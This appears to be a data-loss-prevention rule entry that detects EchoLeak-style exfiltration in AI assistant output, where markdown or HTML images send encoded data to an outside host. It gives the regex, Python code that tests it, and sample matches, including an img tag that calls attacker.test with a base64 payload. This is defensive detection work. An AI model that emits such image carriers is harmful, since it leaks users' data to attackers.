AI Data-Exfiltration Marker
Detects data-exfiltration carriers in AI/LLM output: markdown images or links, and HTML img tags, whose URL points off-tenant and carries an encoded data payload in the path or query. This is a generic, EchoLeak-style (cf. CVE-2025-32711) marker for markdown/HTML exfiltration carriers. It flags the carrier shape only, not the full CVE mechanism, which also involves XPIA evasion and a Teams proxy/CSP bypass.
- Type: regex
- Engine: universal
- Confidence: high
- Confidence justification: High (precision-gated): the pattern fires on outbound content, so it is tuned for a low false-positive rate. It requires an external host plus a long encoded payload; corporate-host and test-text exclusions remove the named false-positive traps.
- Jurisdictions: global
- Regulations: OWASP LLM Top 10 2025, NIST AI RMF GenAI Profile
- Frameworks: ISO 27001
- Data categories: emerging, security
- Risk rating: 9
- Platform compatibility: Purview: Compatible, GCP DLP: Compatible, Macie: Compatible, Zscaler: Compatible, Palo Alto: Compatible, Netskope: Compatible
Pattern
!\[[^\]]*\]\(\s*https?://[^)\s]+[?#&][^)\s]*=[^)\s]{16,}\)
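As a rough check of what the pattern above accepts, the following Python sketch runs it against three sample strings. The sample names, hosts and payloads are illustrative assumptions, not part of the entry. Note that the pattern as listed starts with `![`, so on its own it covers only the markdown image form; plain markdown links and HTML img tags would presumably need additional patterns that are not shown here.

```python
import re

# Pattern copied verbatim from the entry above.
PATTERN = re.compile(
    r"!\[[^\]]*\]\(\s*https?://[^)\s]+[?#&][^)\s]*=[^)\s]{16,}\)"
)

# Hypothetical samples; hosts and payloads are made up for illustration.
PAYLOAD = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo"
samples = {
    # Markdown image, external host, long query value
    "md_image_long_payload": f"![logo](https://attacker.test/p?x={PAYLOAD})",
    # Markdown image whose only query value is far shorter than 16 characters
    "md_image_short_param": "![chart](https://example.test/img.png?v=2)",
    # HTML img tag: there is no leading "![", so this pattern cannot match it
    "html_img_long_payload": f'<img src="https://attacker.test/p?x={PAYLOAD}">',
}

results = {name: bool(PATTERN.search(text)) for name, text in samples.items()}

for name, matched in results.items():
    print(f"{name}: {'match' if matched else 'no match'}")
```

The pattern itself does not inspect the host, so any corporate-host exclusion has to be applied as a separate step.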
Corroborative evidence keywords
image, link, markdown, render, AI, artificial intelligence, LLM, large language model, Copilot, chatbot, assistant, agent, prompt, system prompt, tool call, completion, model
Proximity: 300 characters
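One way to read the keyword list and the 300-character proximity is sketched below. This is an assumption about how a DLP engine might apply them, not a description of any specific product: keywords are matched case-insensitively on word boundaries, the window extends 300 characters to each side of the pattern match, and keywords inside the match itself are ignored. The function name `has_nearby_keyword` is hypothetical.

```python
import re

# Keyword list and proximity taken from the entry above.
KEYWORDS = [
    "image", "link", "markdown", "render", "AI", "artificial intelligence",
    "LLM", "large language model", "Copilot", "chatbot", "assistant",
    "agent", "prompt", "system prompt", "tool call", "completion", "model",
]
PROXIMITY = 300

# Assumption: whole-word, case-insensitive keyword matching.
KEYWORD_RE = re.compile(
    r"\b(?:" + "|".join(re.escape(k) for k in KEYWORDS) + r")\b",
    re.IGNORECASE,
)


def has_nearby_keyword(text, start, end, window=PROXIMITY):
    """Return True if a keyword lies within `window` characters of text[start:end].

    Keywords that overlap the pattern match itself are not counted
    (an assumption; engines differ on this point).
    """
    lo = max(0, start - window)
    hi = min(len(text), end + window)
    for kw in KEYWORD_RE.finditer(text):
        outside_match = kw.end() <= start or kw.start() >= end
        inside_window = kw.start() >= lo and kw.end() <= hi
        if outside_match and inside_window:
            return True
    return False


# Usage: locate a carrier (here by plain substring search) and check its context.
carrier = "![logo](https://attacker.test/p?x=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo)"
text = "The assistant rendered this: " + carrier
pos = text.index(carrier)
corroborated = has_nearby_keyword(text, pos, pos + len(carrier))
```

Scanning the whole text and filtering by span, rather than slicing out the window first, avoids a truncated word at the window edge being mistaken for a keyword.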
Should match
- Markdown image to external host with long base64-like query payload
<img src="https://attacker.test/p?x=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo"> - HTML img tag to external host with encoded payload
Should not match
- SharePoint deep link (corporate host, no data payload)
- Analytics URL with short, non-data parameter
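The two non-matching cases rely on the gates named in the confidence justification: an external host and a long encoded payload. A minimal sketch of such a gate follows. The suffix list `CORPORATE_SUFFIXES`, the helper names, the example URLs and the character-set test for "encoded" are all assumptions made for illustration; the 16-character minimum mirrors the `{16,}` in the pattern. The test-text exclusion is not modelled.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would use its own tenant domains.
CORPORATE_SUFFIXES = ("sharepoint.com", "corp.example")

# Crude assumption for "encoded": 16+ characters drawn from the
# base64, base64url, hex and percent-encoding alphabets.
ENCODED_RE = re.compile(r"[A-Za-z0-9+/_=%-]{16,}")


def is_corporate(host):
    """True if host equals, or is a subdomain of, an allowlisted suffix."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in CORPORATE_SUFFIXES)


def looks_like_carrier(url):
    """True for an off-tenant http(s) URL with a long encoded path or query value."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    if is_corporate(parts.hostname):
        return False
    # Split the raw query by hand so '+' and '%xx' are not decoded away.
    values = [item.partition("=")[2] for item in parts.query.split("&")]
    segments = [seg for seg in parts.path.split("/") if seg]
    return any(ENCODED_RE.fullmatch(c) for c in values + segments)


# Usage with made-up URLs shaped like the cases listed above.
checks = {
    "attacker": looks_like_carrier(
        "https://attacker.test/p?x=QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo"
    ),
    "sharepoint": looks_like_carrier(
        "https://contoso.sharepoint.com/sites/team/Shared%20Documents/report.docx"
    ),
    "analytics": looks_like_carrier(
        "https://cdn.example.test/pixel.gif?utm_source=newsletter"
    ),
}
```

The character-set test is deliberately simple and would also accept long hyphenated slugs in a path, so a production rule would likely need an entropy or decoding check on top of it.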